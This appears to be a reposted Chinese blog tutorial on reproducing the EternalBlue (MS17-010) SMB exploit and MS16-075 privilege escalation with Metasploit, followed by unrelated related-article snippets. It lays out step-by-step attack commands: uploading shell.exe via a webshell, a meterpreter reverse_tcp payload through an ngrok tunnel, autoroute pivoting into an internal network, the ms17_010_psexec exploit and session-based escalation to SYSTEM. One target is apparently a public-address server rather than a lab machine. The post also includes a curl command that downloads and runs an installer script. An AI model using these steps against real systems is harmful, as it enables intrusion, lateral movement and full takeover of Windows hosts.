ms17010复现、ms16-075提权

摘要:
1、 Ms17010复制1。什么是ms17010?EhernalBlue通过Tcp端口445和139利用SMBv1和NBT中的远程代码执行漏洞。恶意代码将在445文件共享端口打开的情况下扫描Windows计算机。无需用户操作。攻击者只需打开Internet即可获得系统许可并在计算机和服务器中植入勒索软件。

一、ms17010复现

1、ms17010是什么

Ehernal Blue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能获取system权限,且在电脑和服务器中植入勒索软件。

 

2、复现

①复现环境

kali     攻击机     ip:192.168.230.143

windows server 2003 ip:192.168.230.147

ngrok   内网穿透    id:170517247807     ip:vipgz2.idcfengye.com     port:10013  本地:127.0.0.1:8000

windows server2008 R2  ip:119.60.126.9

②对服务器win2008进行攻击

 当我们通过大马将shell.exe上传到服务器,并执行获得msf连接后。可以通过background命令将其放在后台运行,想要再次进入会话时,输入命令sessions -i id

image.png

image.png

因为公网服务器和被攻击服务器是处于两个网段,属于不同的网络,所以当我们想要访问被攻击服务器背后的整个内网时,就要在中间添加路由,搭桥,公网服务器可以将数据传给被攻击服务器,从而访问其后的内网。

image.png

image.png

这种情况如果被攻击服务器2和被攻击服务器之间能通信,那么只用搭建一条路由,如果他们两个不能通信,那么还得搭建公网服务器和被攻击服务器2之间的路由才行(内网流量代理/msf添加路由)

现在开始添加路由:

run get_local_subnets    获取当前路由

run autoroute -s 119.90.126.0 -n 255.255.255.0   添加路由

run autoroute -p  查看当前路由

image.png

然后把会话挂到后台后,查找主机是否存在ms17-010漏洞 use scanner/smb/smb_ms17_010

设置扫描主机ip ,可以看到当前服务器并不存在ms17-010

image.png

③对虚拟机win2003进行攻击

桥接模式:虚拟机和本机处于同一个级别,都是路由器分配的ip。

nat模式:虚拟机处于本机的子类。 但是他们还是在一个局域网,只是这个局域网是本机发起的。

 

步骤:

use scanner/smb/smb_ms17_010扫描主机是否存在ms17-010

set RHOSTS XXX.XXX.XXX.XXX 设置目标机ip

run

use exploit/windows/smb/ms17_010_psexec (2003 xp 2012)

set payload windows/meterpreter/reverse_tcp

set RHOST XXX.XXX.XXX.XXX 目标机ip

set LHOST XXX.XXX.XXX.XXX 攻击机ip

run

image.png

image.png

image.png

成功拿到system权限

 

二、ms16-075提权

1、更新kali

由于之前版本太低,msf也不能搜索ms16-075出来,漏洞库没有更新,所以升级msf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

 

2、使用msf的ms16-075攻击模块

我们把当前的shell放在后台,用search ms16-075找他的攻击模块,看到有两个,随便选一个

image.png

这里选的是第二条,use这个模块

image.png

options一下,看看他怎么用的,看样子要设置session

image.png

查看当前有哪些会话,设置一个会话

image.png

exploit开始攻击,可以看到直接就是system权限了

image.png

以上都是在ngrok工作下进行的

免责声明:文章转载自《ms17010复现、ms16-075提权》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇linux进程状态详解(转)服务监控之 Spring Boot Admin.下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

集群配置 出现 “没有到主机的路由”

启动zk后,bin/zkServer.sh start 启动成功,然而用bin/zkCli.sh -server ip:port 显示  没有到主机的路由 的问题,查看 每个集群的 防火墙是否关闭 service iptables status  如果显示  “未运行防火墙”则正常,否则关闭 service iptables stop...

OSPF 做负载均衡

使用OSPF做负载均衡探究 一、OSPF产生背景 随着互联网的快速发展,为了满足建造越来越大基于IP网络的需要,不得不把网络逻辑结构划分为一个个单一自治系统。 二、OSPF技术原理 OSPF(Open Shortest Path First开放式最短路径优先 )是一个内部网关协议(Interior Gateway Protocol,简称IGP),用于在单一...

完美的外出上网解决方案随身随地享用你的专有WIFI网络(3G无线路由器+sim卡卡托+3G资费卡)

距离元旦和春节长假越来越近了,相信周围很多朋友肯定是打算趁着长假出去旅旅游。正好前几天跟一个朋友聊到在外面上网不方便的问题。因此我今天专门写一篇Blog来介绍一下我当时去西藏时的上网解决方案,供周围有类似外出需要上网的朋友参考。 正式介绍之前为了便于“小白”朋友的理解,我先介绍几个概念: 3G网络:具体的概念在这里我就不废话了,你只要STFG(Search...

为什么ip层收到的报文可能已经设置了路由

一、收到报文对于网络地址的判断 对于刚收到的网络数据,经过了NF_IP_PRE_ROUTING过滤之后,开始到达了ip_rcv_finish函数,在该函数的开始做了一个看起来比较诡异的操作,就是判断了这个数据包中的路由dst是否已经设置过了,如果没有设置过则进行路由;这也就是反过来说,一些收到的报文是可能已经设置过了了路由。那么为什么会有这样的报文,它们...

【IP地址租约到期】-解决方式

  IP地址租约期限是指客户端设备在DHCP服务器所获取的IP地址配置信息的使用期限。   客户端也就是电脑或手机等设备在自动获取一个IP地址后,一般会有一定的使用期限,期限过后需要重新申请IP地址。   然而频繁的IP地址变动会给管理工作带来麻烦,用户可以通过设置IP地址租约期限使客户端设备拥有IP地址的永久使用权。   一般在路由器或者网络设备的DHC...

module/config/module.config.php文件内涵定义

'router' =>array(),// 路由 'controllers' =>array(),// 控制器 'view_manager' =>array(),// 视图管理器 'service_manager' =>array(),// 服务器管理器 'translator' =>array(),// 译码器或翻译器 'n...